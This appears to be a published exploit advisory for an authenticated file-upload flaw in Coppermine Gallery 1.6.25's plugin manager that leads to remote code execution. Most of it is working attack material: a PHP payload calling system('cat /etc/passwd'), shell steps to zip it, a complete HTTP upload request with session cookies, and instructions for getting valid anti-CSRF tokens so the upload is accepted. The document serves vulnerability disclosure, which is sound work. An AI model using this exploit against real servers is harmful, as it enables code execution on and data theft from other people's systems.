Coppermine Gallery 1.6.25 Remote Code Execution
Coppermine Gallery version 1.6.25 remote code execution exploit.
Exploit Title: coppermine-gallery 1.6.25 RCE
Application: coppermine-gallery
Version: v1.6.25
Bugs: RCE (authenticated arbitrary file upload through the plugin manager)
Technology: PHP
Vendor URL: https://coppermine-gallery.net/
Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zip
Date found: 05.09.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================

The plugin manager (pluginmgr.php?op=upload) accepts a zip archive and unpacks it into the plugins/ directory without verifying that the archive holds an actual plugin. A zip containing nothing but a PHP file therefore lands as a web-reachable script under plugins/, and requesting that script executes the uploaded code on the server.

Steps

1. First of all, create a PHP file with the content <?php echo system('cat /etc/passwd'); ?> and compress it with zip:

$ cat > test.php
<?php echo system('cat /etc/passwd'); ?>
$ zip test.zip test.php

2. Log in to an account that can reach the plugin manager.
3. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php
4. Upload the zip file.
5. Visit the PHP file at http://localhost/cpg1.6.x-1.6.25/plugins/test.php; the response contains the output of cat /etc/passwd.

PoC request

POST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1
Host: localhost
Content-Length: 630
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342c
Connection: close

------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="plugin"; filename="test.zip"
Content-Type: application/zip

[binary contents of test.zip: a zip archive holding test.php, which contains <?php echo system('cat /etc/passwd');?>]
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="form_token"

50982f2e64a7bfa63dbd912a7fdb4e1e
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="timestamp"

1693905214
------WebKitFormBoundaryi1AopwPnBYPdzorF--

The cookie, form_token and timestamp values above are from the author's test session: form_token and timestamp are the hidden anti-CSRF fields of the pluginmgr.php upload form and must be taken from a freshly loaded copy of that page in the logged-in session, otherwise the upload is rejected.